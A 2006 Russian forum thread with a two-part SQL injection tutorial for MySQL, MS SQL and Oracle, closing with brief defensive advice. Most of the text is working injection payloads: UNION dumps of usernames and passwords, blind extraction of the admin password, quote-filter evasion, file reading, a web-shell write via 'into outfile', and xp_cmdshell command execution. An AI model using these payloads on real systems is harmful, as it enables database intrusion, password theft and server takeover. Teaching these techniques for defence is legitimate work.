Авторские статьи SQL инъекция (в т.ч. и blind SQL)

Discussion in 'Статьи' started by kot777, 29 May 2006.

Thread Status:
Not open for further replies.
  1. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Проведение sql-injection на ms sql и mysql серверах
    Уязвимости класса sql-injection являются одной из самых актуальных проблем сетевой безопасности, т.к. с помощью подобной атаки проводимой хакером возможно получение паролей пользователей находящихся в базе данных sql сервера. По моим последним наблюдениям до 80% веб ресурсов сети подвержены подобным атакам, это относится и к крупным проектам. Как же защить свой скрипт? Ответ прост - фильтровать данные полученые от пользователя, но к сожалению (а для хакера к счастью) во множестве публичных скриптах, что особенно опасно, этого не наблюдается. Так же проведению атаки взломщику поможет и неправильная настройка сервера, поэтому всегда нужно точно следовать руководству самого производителя ПО. Перед составлением скрипта разработайте собственную архитектуру, например фильтруйте данные перед тем как они понадобятся. Не используйте опасных функций в которые даже после фильтровки идут пользовательские данные к примеру php функция eval в большенстве случаев заменима, но вред который она может принести значителен как и любая php-injection. На этом краткий ввод в безопасность я считаю оконченным, могу лишь добавить что взлом это 99% человеческий фактор - ПО делают люди. Что бы сделать скрипт безопасным проверяйте его всегда сами, чтобы защить сайт от хакера нужно думать как хакер. Теперь попробуем взломать сами себя, чтобы в последствии защить свой сайт и т.д. от хакера.
    Ошибки связанные с sql-injection
    Здесь я опущу описание взлома через очевидные ошибки возвращаемые сервером. Пусть после подставления ' мы не получили ни одного сообщения об ошибке, сразу скажу что это не значит что ошибок нет - это значит что либо таковы настройки сервера, либо в самом скрипте идет внутрення обработка ошибок уже ПОСЛЕ запроса к sql серверу. Пусть запрос к веб ресурсу xaxa.com выглядит следующим образом http://xaxa.com/index.php?id=5 и при подставновке кавычки в id сервер не сообщает об ошибке sql запроса. Для начала нужно выяснить какой тип действительно передается в базу данных, id=5 не значит что запрос идет с типом int вполне возможно что это строка. Сделаем следующие отправим скрипту id=6 и если возвращается страница отличная от индекса (скорее всего скрипт напишет не найдена страница) то отправим id=6%2d1 и если возвратится тот же самый результат что и при запросе id=5 то уязвимость скорее всего есть. Если нет тогда предположим что передается строка при id=5 так:
    select page_title,page_text from pages where page_id='5'
    тогда согласитесь что вполне корректным запросом будет select page_title,page_text from pages where page_id='5'+'1', даже если бы там стояли скобки. Из предположения о работе скрипта отправим в качестве id значение равное 5'%2b'1 если возвратится результат такой же что и при запросе id=51 или вылезет много страниц можно считать что уязвимость есть. Теперь попробуем сделать саму инъекцию. Пусть запрос выглядит так:
    Code:
    select page_title,page_text from pages where (page_id='5')and(page_status>0)
    тогда нам нужно подставить такое page_id что бы получился коректный запрос к базе. Попробуем отправить id=5')-- если результатом будет ошибка то возможно запрос подается нев одной строке попробуйте так id=5')/* . Преположим мы добились положительного ответа от сервера, тогда как нам использовать полученый результат? В большенстве случаев потребуется определение версии sql сервера. Наиболее распространнем сейчас является MySQL новых версий в которых добавлено использование оператора UNION. Сделаем следующий запрос:
    Code:
    select page_title,page_text from pages where (page_id='5')union select null,null/*')and(page_status>0)
    этот запрос будет коректен будет возвращен тот же самый запрос что и при запросе с id=5. Теперь подобрав количество столбцов для объеденения подстваим
    Code:
    id=5')union select 10000%2b1,20000%2b1/*
    теперь в исходном коде получившейся страницы попробуем найти строки типа 10001 или 20001 если такие были найдены то это очень облегчит нашу задачу. Теперь пусть на сервере есть таблица пользователями находящияся и в той же базе что и pages. Составим запрос с
    Code:
    id=5')union select user_name,20000%2b1 from users/*
    и если в месте где было 10001 мы увидим строчку с именем пользователя то можно считать инъекцию успешной. Если это не так тогда имя поля с именами пользователей таблицы users подобранно неправильно. Возможн вариант что при ВЫХОДЕ данные фильтруются для проверки такого предположения составим запрос с
    Code:
    id=5')union select 0x5841,20000%2b1/*
    и если в исходном коде страницы будет видно надпись XAXA то никакие проверки на выходе не идут и все хорошо. В противном случае придется использовать "логику запросов". Например в простейшем случае, если выводится число 10001 то сделаем запрос с
    Code:
    id=5')union select ascii(lawer(substring(user_name,1,1))),20000%2b1 where user_id=1/*
    если в полученом коде возвращаемой страницы на месте 10001 бедт стоять число отличное от нуля то инъекция опять таки проведена успешно, таким образом за несколько подобных запросов можно перебрать и пароль и имя любого пользователя. Возможно вариант что числа 10001 не видно в сурсе, что делать тогда? Наилучшем вариантом будет поддержка подзапросов, например
    Code:
    select page_title,page_text from pages where (page_id='5')and((select ascii(lawer(substring(user_name,1,1))) from users where user_id=1)>100)/*')and(page_status>0)
    тогда скрипт выведет что либо только если результат второй скобки обращается в true или первый символ первого пользователя имеет ASCII код больший 100. Таким образом за некоторое количество запросов подобрать имя и пароль пользователя всегда возможно. А что делать если подзапросы данный сервер не поддерживает? Тогда попробуем сосздать следующей запрос к базе данных:
    Code:
    select page_title,page_text from pages where (page_id='-555')union select pages.page_title,pages.page_text from pages,users where pages.page_id='5' and(ascii(lawer(substring(users.user_name)))>100)and(users.user_id=1)/*')and(page_status>0)
    Понятно что первый selec не возвратит в результате null, а второй как раз в качестве двух столбцов возратит тоже что и при id=5 но при дополнительном условии - если первый символ имени пользователя с user_id=1 имеет ASCII код больший 100. Таким образом после такого перебора в конце концов взломщик сможет получить незащищенные данные пользователей вплоть до паролей. Еще одна "хитрость" sql (работает как и в mysq, так и в mssql) пусть нам нужно возвратить для анализа скрипта строку XAXA тогда нам понадобятся кавычки которые могут фильтроваться. Выхода из такой ситуации два функция char, которая в mssql отказывается нормально работать, и использование 16-ти битной кодировки, которую sql понимает как строчку. Второй вариант мне больше подуше и поэтому вот php скрипт возвращающий 16 битное значение строчки:
    Code:
    <?
    echo('0x'.bin2hex($str));
    ?>
    
    Таким образом вместо 'XAXA' вполне допустимо подставлять 0x58415841. Если же на сервере запущен mssql, то в проведении инъекции обычно не возникает сложностей благодаря возможностям своего синтаксиса, сюда можно отнести и выполнение команд на сервере и реализация подзапросов.
    Заключение
    Здесь была описана методика внедрения sql кода в запрос скрипта больше описывать бессмысленно т.к. для этго существуют справочники и документации на официальных сайтах mysq, msssql, oracle и т.д. Все сотальные навыки по защите/взломе накапливаются только с опытом и собственными исследованиями.
    Статья написана ZaCo специально для kot777, m0nzt3r и раздела Безопасность WEB - приложений.
    Продолжение следует...
     
    #1 kot777, 29 May 2006
    Last edited: 29 May 2006
    18 people like this.
  2. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Продолжение

    Логика построения SQL-inj запросов.
    Здравствуйте!
    Эта статья посвящена способам защиты баз данных под управлением sql сервера. Для начала определимся что же такое база даных? На самом деле это просто
    файл или обьеденение файлов, который содержит в себе различные таблицы, записи и тд. База данных- это объединение таблиц, таблица - объединение записей,
    а запись - полей. Поле - важнейшая "единица" базы данных; в нем могут храниться значения различных типов. Не стоит забывать, что в базе данных хранятся
    не только сообщения ленты новостей, но так же и пароли от кошельков, почтовых ящиков и тд. Атаки на базы данных с помощью внедрения своего запроса отнесли
    к специальному классу - sql-injection. Что подразумевает внедрение "зловредного" кода в запрос, отсылаемый, например, скриптом к sql серверу (например mysql).
    В этой статье не будет "зацикливания" на определенных видах субд (система управления базами данных), просто логика построения sql запросов, которые будут
    выполняться во всех современных sql субд с незначительными изменениями.

    Логика запроса.

    Очевидно, что для того чтобы уметь защищать свои базы, нужно мыслить как взломщик, поэтому мы попытаемся "взломать" сами себя.
    Для начала нужно убедиться в том, что переменные, отправляемые клиентом серверу, впоследствии передаются именно в sql запрос,
    тем самым давая возможность для проведения инъекции. Пусть, например, на первой страничке сайта имеется форма авторизации пользователя:

    Code:
    +--------------------+
    |Ваше имя на сайте : |
    |Ваш пароль        : |
    +--------------------+
    
    Взломщику требуется пароль от юзера с логином admin, тогда представим себе примерную работу скрипта (примеры на пхп), отсылающего введенные данные на sql
    сервер.

    Code:
    $username=$_POST["username"];
    $password=$_POST["password"];
    sql_function("select user_ip,image,email,web from users where name="".$username."" and passwd="".$password.""")
    
    sql_function - придуманная функция, отсылающая введенное имя пользователя - username и пароль - password. Запрос дожен вытащить ип и
    картинку (юзера) с такими логином и паролем.
    Как можно заметить, никаких проверок на правильность введенных значений просто нет. Что же делает взломщик? Пусть ему нужно узнать email жертвы, тогда sql
    сервер не будет против такого запроса:

    "select user_ip,image,email,web from users where name="admin"/* and passwd="123456""

    "/*" - это комментарии распространяющиеся от начала и до конца запроса, аналогом может служить "#" или "--" - до конца строки запроса.
    К слову сказать запрос в MYSQL с "/*" без закрывающей части "*/" будет обрабатываться коректно, тогда как MS SQL например будет требовать "*/".
    Пусть в скрипте присутствует "фильтрация", тогда введем в поле имени следующее значение:

    Code:
    ""or "1"="1"
    Заметим, что такой запрос также будет верным: первая кавычка закроет значение имени, а последнюю закроет кавычка передаваемая самим скриптом. Возможно
    запрос сложнее, и так сразу эксплуатировать уязвимость не удасться, поэтому для начала достаточно будет определить лишь сам факт наличия. Так как очевидно,
    что передается строковая переменная, то введем в поле логина следующее значение:

    Code:
    xa"+"xa"
    причем пусть пользователь xaxa зарегестрирован на сайте и имеет пароль lala, тогда запрос будет корректным, и если кавычки не экранируются, то сервер
    возвратит данные для пользователя xaxa, что подтвердит наличие уязвимости. Но случай приведенный здесь слишком тривиален, поэтому разберем ещё парочку
    интересных вариантов. Для начала ознакомимся с четырьмя функциями MySQL (их аналоги в MS SQL и прочих субд можно найти на сайте sql.ru):

    1) substring(str,begin,length) - возвращает подстроку str, начиная с begin символа по счету длиной численно равной length.
    2) ascii(char) - возвращает ASCII код символа char
    3) lower(str) - возвращает строку str, в которой все символы приведены к нижнему регистру
    4) CHAR_LENGTH(str) - возвращает длину str

    Пусть на сайте существует поиск юзера по нику или полу, по имени или фотографии и тд. Рассмотрим, например, какой-нибудь сайт знакомств. Вполне разумно
    будет предположить, что поиск ведется по таблице типа users, в которой очевидно сожержаться пароли.

    Code:
    +--------------------+
    |Поиск по имени:     |
    +--------------------+
    
    Введем например "Саша", тогда в ответ мы получим список пользователей с именем Саша. Теперь попробуем ввести знакомую конструкцию

    Code:
    саш"+"а
    Если фильтрация отсутствует, то запрос будет корректен, и мы получим тот же список. Теперь введем

    Code:
    саша" and "1"="1
    Если никаких дополнительных скобок не будет, то запрос будет правилен, и мы получим опять тот же самый список (тк логическое условие сохраняется).
    Попробуем провести полноценную инъекцию

    Code:
    саша" and passwd="123" and "1"="1
    если же столбец passwd действительно существует, то в списке очевидно будут присутствовать только те имена пользователей, чьи пароли "123".
    Обычно взломщику записи по паролям не нужны, поэтому введем в поле поиска

    Code:
    admin" and ascii(substring(passwd,1,1))>100 and "1"="1
    Таким образом, мы получим (скорее всего одну) запись при выполнении условия, то есть если первый символ пароля имеет код больший ста, то мы увидим найденное
    имя "admin", в противном случае скрипт напишет : "ничего не найдено". Аналогично можно получить весь пароль администратора. Сейчас уже редко пароли
    хранятся в открытом виде, поэтому для определения "типа" хеша можно попробовать функцию например md5().

    Инъекции в "числовых" переменных.

    Пусть переменная имеет вид id=47893. Можно предположить, что в sql запросе передается именно число, а не строка. Тогда попробуем подставить

    Code:
    47892+1
    Если результат будет аналогичен тому, что возвращается при id=47893, то можно признать факт наличия уязвимости. Следует понимать, что подставлять нужно не
    только "1" так как иногда скрипты работают не "очевидно"+) Пусть пока никакой уязвимости не найденно, тогда подставим

    Code:
    47893 and(1=1)
    Если рузультат тот же, то подставим

    Code:
    47893 and(1=2)
    Если результаты не совпадают, то уязвимость определенно есть. Многие скрипты обрамляют условия в операторе WHERE скобками, поэтому можно попробовать
    подставить например

    Code:
    47893)and(1=1
    последнюю кавычку закроет сам скрипт и результат выполнения будет аналогичен тому же что и подстановке:

    Code:
    47893
    Использование оператора UNION.

    Инъекции с использованием UNION пожалуй стандарт проведения sql-inj. Он используется в связке с оператором SELECT. Применяется Union для объеденения двух,
    а может и более запросов. В mySQL его поддержка введена, начиная с четвертой версии. Пример

    Code:
    select id,name from users union select 10,"xaxa" from news
    В итоге мы получим тот же результат, что и без

    Code:
    union select 10,"xaxa" from news
    а в конце будет просто добавлено 10 "xaxa". Вместо 10 или "xaxa" можно написать имя столбца соответствующего типа. В последнем операторе select часть
    "from table" можно опустить. У оператора UNION всего два требования - соответствие по типам от предыдущего select, то есть в нашем примере id имеет тип
    int и 10 имеет такой же тип, name - строка и "xaxa" - строка и количество соответствующих столбцов должно быть одинаково. Надеюсь, вы уже заметили выгоду
    использования UNION. Пусть первоначальный запрос выглядит так

    Code:
    select news_id,message from news where id=47893
    Если вывод сведений об ошибке sql запроса не выводится, то эффективнее поступать так: найти любое доступное имя таблицы, а потом задать следующий запрос

    Code:
    select news_id,message from news where id=47893 union select null from lala
    как же найти lala? Легче всего установить имя талицы из которой происходит первоначальная выборка данных. Для этого задаим следующий запрос

    Code:
    select news_id,message from news where id=47893 or id=47893
    Если запрос выполнится успешно, то это говорит о существовании столбца id. Теперь найдем талицу

    Code:
    select news_id,message from news where id=47893 or news.id=47893
    Если результат будет аналогичен предыдущему, то news действительно существует.
    Так как мы не знаем реальные типы столбцов, то следующий запрос будет корректно обрабатываться как сервером sql, так и скриптом, который будем оперировать с
    результатом

    Code:
    select news_id,message from news where id=47893 union select null,null from news where 1=2
    Напомню null - специальный тип данных, в котором хранят "отсутствующие" значения. В результате выполнения этого запроса мы получим то же ,что и без части
    с UNION (тк 1<>2). Если же ошибка все же присутствует, то это говорит лишь о том, что эта версия не поддерживает UNION или колличество столбцов не
    соответствует реальному. Перебрав количество столбцов зададим следующий запрос

    Code:
    select news_id,message from news where id=-47893 union select name,passwd from users
    Обратите внимание на минус, это значит, что первый SELECT возвратит нулевое количество записей, то есть в результате будут только записи из второго
    SELECT. Но как вы наверное заметили news_id имеет тип int, а name очевидно строка, в таком случае, в зависимости от sql сервера имен пользователей мы не
    увидим или будет ошибка несоответствия типов. Тогда придется вести перебор типов. Если результат не будет сожержать ошибки, например

    Code:
    select news_id,message from news where id=-47893 union select 100+1,passwd from users
    то в результате должна присутствовать запись с полем, значением которо является 101=100+1. Как же получить имена юзеров не исбавляясь от паролей? Тут нам
    поможет ещё одна стандартная функция mySQL:

    1)concat(str1,str2,str3,..) - "склеивает" строки str1,str2,str3 и тд, и возвращет полученный результат.

    А теперь зададим следующий запрос

    Code:
    select news_id,message from news where id=-47893 union select 1,concat(name,":",passwd) from users
    Результат будет содержать записи вида

    Code:
    name:pass
    Такой запрос для большой бд будет выполняться очень долго, поэтому удобно использовать оператор LIMIT

    Code:
    select news_id,message from news where id=-47893 union select 1,concat(name,":",passwd) from users limit 3000,1000
    в итоге получим 1000 (или меньше, в зависимости от общего количества) записей начиная с 3000"ой по счету.
    Все бы хорошо но попадаются версии MySQL без поддержки UNION. Как быстро определить версию сервера? Для этого существует полезная функция version().
    А вот ещё немного:

    Code:
    1)DATABASE() - возвращает имя текущей бд, в MS SQL это BD_NAME()
    2)USER(),SYSTEM_USER(),SESSION_USER() - возвращают имя текущего пользователя, аналогично USER() в MS SQL
    
    Использование подзапросов.

    В раних версиях mySQL оператора UNION не существовало, но была красивая замена - подзапросы. Что же означает строка следующего вида

    Code:
    select id from users limit 1
    В принципе это и есть подзапрос, но в непривычной форме. Пусть есть обычный запрос

    Code:
    select news_id,message from news where id=1
    И значение id мы можем менять, тогда запрос, в соответствующей версии сервера sql, будет корректен

    Code:
    select news_id,message from news where id=(select id from users where name="admin")
    Основными условиями использования подзапроса является то, что выбираться должен только один столбец и возвращаемая запись должна быть так же одна.
    С логической точки зрения это действительно правильно. Теперь применим накопившиеся знания на практике

    Code:
    select news_id,message from news where id=47893 and (select ascii(substring(passwd,1,1)) from users where name="admin")>100
    Таким перебором можно получить весь пароль администратора.

    Использование раздельных запросов.

    Конечно большинство запросов отсылаемых скриптом серверу идут непосредственно в операторе SELECT, но кроме него существуют операторы update, delete и тд.
    Так как MySQL раздельные запросы (то есть через разделяя весь запрос ";" за один раз сервер способен обработать несколько запросов) не поддерживает,
    то инъекцию можно провести только при поддержке подзапросов. Например так:

    Code:
    update users set user_sig=(select passwd from users where id=1) where id=893
    Теперь посмотрим, как использовать раздельные запросы, если первоначальный запрос идет не в операторе UPDATE, а в каком-то другом

    Code:
    select news_id,message from users where id=47893;update users set user_sig=(select passwd from users where id=1) where id=893
    Но перед этим нужно убедиться что sql сервер действительно поддерживает эту возможность, для этого можно составить запрос примерно такой

    Code:
    select news_id,message from users where id=47893;create table lala(xxx int)
    И далее

    Code:
    select news_id,message from users where id=(select 1 from lala)
    Если запрос пройдет без ошибок, то понятно, что пользователь "lala" существует, а это значит, что раздельные запросы поддерживаются.

    "Полезные" запросы.

    Несомненно SELECT идеальный вариант, но как же определить, что запрос идет непосредственно в SELECT? Для этого можно попробовать вставить в конец запроса
    LIMIT. Отсутствие ошибки будет говорить о том, что сервер во-первых работает на MySQL (так например LIMIT - это не стандарт sql) и конечно о том, что там
    действительно SELECT. Если же это не MySQL то попробуйте подставить предложение "GROUP BY 1" или "HAVING 1=1" - стандарт sql и работает только в операторе
    SELECT. Этих двух способов вполне достаточно для выявления "типа" запроса. А теперь представьте, что имеется факт наличия инъекции и уязвимый параметр
    передается sql серверу в операторе SELECT, казалось бы все идеально, но даже с поддржкой UNION в некотрых скриптах провести полноценную инъекцию бывает
    тяжело. Пусть скрипт получает от sql сервера записи и дальше оперирует с ними до вывода, причем это "оперирование" может быть достаточно сложным. Например,
    пусть в конечном итоге скрипт должен получить запись содержащую дату и выделить из неё месяц и т.п. Но если вы не подобрали какую нибудь существующую
    таблицу (тогда можно вставить в конец предложение where 1=2 и эта строка просто не выведится), то простой перебор типа

    Code:
    ...union select null,null,null
    может привести к ошибке, ещё хуже если она будет невидимой, даже если количество null"ов и количество столбцов в первоначальном select одинаково! Можно
    долго пытаться угадать где возвращется дата или какой нибудь типа данных. Куда легче сначала точно определить количество столбцов в первоначальном select
    и уже потом довести инъекцию до конца. Для этого очень удобно использовать следующую особенность оператора ORDER BY, дело в следующем, синтаксис его таков,
    что упорядочивать строки запроса можно только по тем столбцам которые передаются в select, причем имя столбца можно заменить его порядком в запросе.
    Другими словами, пусть есть запрос:

    Code:
    select news_id,message,autor from news where news_id=333 order by lala
    тогда lala может принимать значение news_id,mewssage или autor, или 1,2 или 3. Даже если таблица news содержит ещё столбцы не входящие в select их передавать
    в lala Нельзя - это вызовет ошибку. Таким образом можно довольно просто подобрать количество всех столбцов так:

    Code:
    select news_id,message,autor from news where news_id=333 order by 2
    Далее 3, а на значении 4 в ответе мы увидим ошибку, это говорим о том, что столбец с номером 4 в select отсутствует, то есть их общее количество равно 4-1=3.
    В дополнение хочеться сказать, что такой метод наиболее оптимален почти по всем параметрам, по сравннию с простым перебором null"ов. Так как,
    если в операторе select уже присутствует предложение order by, то добавить конструкцию union select не удасться - т.к. этого не позволяет синтаксис.
    ПОэтому если добавить к запросу order by не удается (будет сообщение об ошибке или результат будет пустым), то это уже говорит о невозможности
    использования union, и бесконечно беребирать количество столбцов уже не нужно. А если в первом select уже был group by это не помешает добавить
    order by и впоследствии, даже, union. Если же количество столбцов подобрано верно, то есть, нашли максимальный номер столбца ORDER BY MAX_Number и в
    тоже время вставка union select 1,2,..,Max_Number не срабатывает это говорит о том, что в скрипте (уязвимой приложении) идет два или более запросов
    с уязвимым параметром содержащим РАЗНОЕ количество столбцов в select (возможно там будет вообще не select), тогда провести sql-injection с помощью
    UNION не удасться, но можно попробовать использовать раздельные запросы.

    Иногда взломщик может взять нужные ему данные из таблицы даже когда нет поддержки ни UNION, ни подзапросов. Пусть имеется простейший запрос:

    Code:
    select news_id,message from news where news_id=333
    Тогда, если значение передаваемое в news_id не фильтруется, можно получить доступные таблицы так:

    Code:
    select news_id,message from news where news_id=333 natural left join mysql.user
    В случае результата схожего с предыдущем или отсутствием ошибок можно говорить, что таблица mysql.user доступна и в дальнейшем из неё можно
    получить нужные данные так:

    Code:
    select news_id,message from news where news_id=333 natural left join mysql.user where user="root" and ascii(substring(password,1,1))=111
    Аналогичным перебором можно получить весь пароль и подключиться к баз данных под root.

    Обход экранизации кавычек в запросе.

    Иногда скрипт все же экранирует спецсимволы, например только кавычки. Но это "препядствие" так же можно обойти. Будь то mssql или
    PostgresSQL c помощью любимой поисковой машины аналоги функций описываемых здесь или языковых конструкций всегда можно найти. В MySQL и MS SQL есть
    очень интерсная особенность, а именно представление строк в 16-ом формате. Тоесть

    Code:
    select 0x78617861
    Вернет нам строку "xaxa". Для того чтобы обычную строку быстро перевести в 16-и битное представление можно применить такой простой скрипт на php

    Code:
    <?echo("0x".bin2hex("xaxa"))?>
    Аналогом в MySQL может служить функция:

    1)char(c1,c2,c2,..) - возвращает строку состоящую из символов с ASCII кодами c1,c2,c3...

    Возможно взломщику потребуется получить сообщение об ошибке, чтобы определить версию\пути и тд Тогда при удачной передаче в запрос символа нулевого байта \x0 сервер ответит ошибкой.
    Технические особенности

    Основное направление применения атак класса sql-injecton конечно получение информации из баз данных, но в связи с разнообразием различных субд и
    специфических функций для них, существует возможность поднять свои привелегиии в системе не только на уровне самой базы данных, но и в целом.
    Так, например, можно создать\прочитать файл на сервере, выполнять команды в системе и т.д. Выходом за пределы выполнения команд только в БД является
    неправильная настройка сервера и распределение прав.
    1) MySQL:
    Имея на руках инъекцию, и имея определенные права можно "достать" хеш пароля пользователя с правами file из таблицы mysql.user, далее
    восстановить пароль к хешу и попробовать подключиться к удаленному sql серверу. Пример:
     
  3. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Code:
    select user,password,file_priv from user
    user - имя пользователя,
    passsword - 256 битный хеш пароля пользователя, начиная с версии 4.1 - хеш 640 битный. Столбец password, из соображений безопасности хранит ТОЛЬКО
    хеш.
    file_priv - опция отвечает за то, что пользователь имеет привелегию file.
    Если это удастся, опять таки из-хза неправильной настройки сервера,
    то помимо любых операций с доступной базой данных, взломщик получает возможность чтения любого файла в системе, доступного для самого mysql сервера.
    Для этого можно использовать функцию load_file("ПОЛНОЕ ПУТЬ К ФАЙЛУ"). При достаточных правах она возвратит содержимое файла (если файл отсутствует,
    или на его чтение у mysql нет прав, в ответе будет ошибка), в противном случае функция возвращает null. Если вывод сообщений об ошибках отсутствует,
    то можно поступить так:

    Code:
    select if(load_file("blalala") is null,1,2);
    Если в ответе будет 1, то это означает о невозможности использования load_file().
    С ещё большим успехом можно применить конструкцию select * into outfile "ПОЛНЫЙ ПУТЬ К СОЗДАВАЕМОМУ ФАЙЛУ", которая срабатывает очень редко -
    для этого нужно иметь привелегии root. Так можно получить например веб-шелл.
    В отличии от других субд, MySQL, до версии 5, не позволяло получить доступ к именам таблиц и столбцов в определенной БД, тогда как в MS SQL,
    например, это делалось возможным благодаря представлениям INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS.
    В новой версии MySQL 5 появилась возможность доступа к системной базе INFORMATION_SCHEMA. Другими словами, теперь, определив версию sql сервера
    с помощью функции version() или подключившись на 3306 порт (по-умолчанию), можно не подбирать имена таблиц/столбцов наугад, а с помощью таблицы
    INFORMATION_SCHEMA.COLUMNS получить имена ВСЕХ доступных таблиц и соответствующих столбцов, так:

    Code:
     SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="ИМЯ";
    Далее, может оказаться, что таблица с интересующем нас именем находится в другой базе, имя которой мы не знаем, получить его можно так:

    Code:
    SELECT TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME="ИМЯ";
    Иногда, может оказаться так, что база данных использует не стандартную кодировку для хранения строк, для преобразования в нужный формат
    используйте функцию cщтмуке(), для приведения кодировок и типов:
    1) convert(lala,TYPE), TYPE - любой из стандартных типов MySQL : INTEGER, varchar и т.д.
    2) convert("stroka" using cp1251) - возвратит строку "stroka" в нужно вам кодировке.
    Если есть доступ к таблице mysql.user или взломщик уже имеет пароль (пароль к хешу востановлен) нужного ему пользователя он может подключиться
    любым mysql клиентом к вашей базе, конечно если это позволяют привилегии. Самым главным препядствием к подключению является адрес клиента, маска
    доступных к подключению адресов хранится в столбце таблицы mysql.user host. Символ % означает любую последовательность символов, то есть
    host="%.mail.ru" позволит подключится к базе только если клиент находится на любом домене mail.ru, включая его самого. Таким образом чтобы иметь
    полный доступ к базе с любого удаленного адреса поле host для данного пользователя должно иметь значение "%". В противном случае взломщику
    потребуется доступ к серверу адрес которого удовлетворяет маске или же на уязвимом сервере должна быть утилита типа phpmyadmin.

    2) MS SQL
    Доступны представления INFORMATION_SCHEMA.COLUMNS и INFORMATION_SCHEMA.TABLES, про применения см 1
    Поддержка раздленых запросов существенно упрощает жизнь взломщику, достаточно поставить ;КОД--
    Имея определенные права вы можете выполнять команды на сервере так:

    Code:
    exec master..xp_cmd_shell "dir>ФАЙЛ"
    Можно прочитать файл так:

    Code:
    create table test(lala varchar(3000));bulk insert test from "c:/windows/ФАЙЛ"
    Затем, можно получить содержмое файла:

    Code:
    select lala from test;drop table test
    Оператор drop уничтожит ранее созданную таблицу.
    Бывает так, что веб программисты защищают сервер проверкой на наличие слов типа UNION, SELECT и т.п. Но выолнить комманду это не мешает:

    Code:
    ;exec ("UPDA"+"TE users"+"SET password=123456")
    Если уязвимый скрипт выводит сообщение об ошибке, то это сильно упрощает дело взломщику, например:

    Code:
    select news_id from news where id=333 union select name from users
    Если news_id имеет тип INT, То это вызовет сообщение об ошибке т.к. name будет иметь другой тип, например varchar. Вследствии чего,
    в ошибке будет содержаться информация о невозможности приведения строки "admin_login" к целому типу. Так, можно получить и пароль любого
    пользователя. В противном случае, если вывод сообщений об ошибках отсутствует, придется перебирать коды символов имени администратора.
    Допустимо применение функции convert().

    3) Oracle
    Конкатенцаия строк "stroka1"||"stroka2".
    Во отличии от предыдущих серверов баз данных конструкция select columnname; недопустима - нужно обязательно укзаывать имя таблицы.
    Существует метатаблица ALL_TAB_COLUMNS, в которой основные поля: owner, table_name, column_name, data_type.
    Вместо TOP в MSSQL, и LIMIT в MySQL используется конструкция where rownum = 1 или in (1,2).

    Обеспечение собственной безопасности

    Теперь остался самый главный вопрос - как же защитить сервер от sql-injection? Ответ прост - фильтровать все переменные приходящие от клиента,
    конкретнее - проверять все начиная от значений передаваемых по методу GET кончая проверкой cookies. Например, если пердается число, то мы никого
    не обидем если сразу сделаем преобразование intval(), а если строка, то достаточно вырезать ' и " при обычном сравнении и дополнительно _,% при работе например с предложением Like или в любых других, использующих спец символы. Не следует забывать и про опасность нулевого байта в запросе - его так же нужно фильтровать. Ну и конечно не ставить простых администраторских
    паролей, но это уже к теме не относится. Ставить привелегии только при необходимости, для каждой части выделять отдельную БД. Очень полезно хранить
    пароли в зашифрованном виде, например в md5. Также правильная архитектура проекта поможет избежать взлома, сделайте отдельный модуль отвечающий за
    безопасность, фильтруйте данные до того как они попадут в функцию отправки sql запроса и тогда 95% безопасности будет обеспечено.

    Заключение

    К сожалению в этой статье сожержится чрезвычайно мало информации, многое мыслей осталось у меня в голове, поэтому эта статья будет по мере
    возможностей пополняться. Все свои замечания и предложения на [email protected].
    При подготовке статьи были использованны материалы :
    http://mysql.ru
    http://sql.ru
    podkashey

    (c) ZaCo
     
    2 people like this.
Thread Status:
Not open for further replies.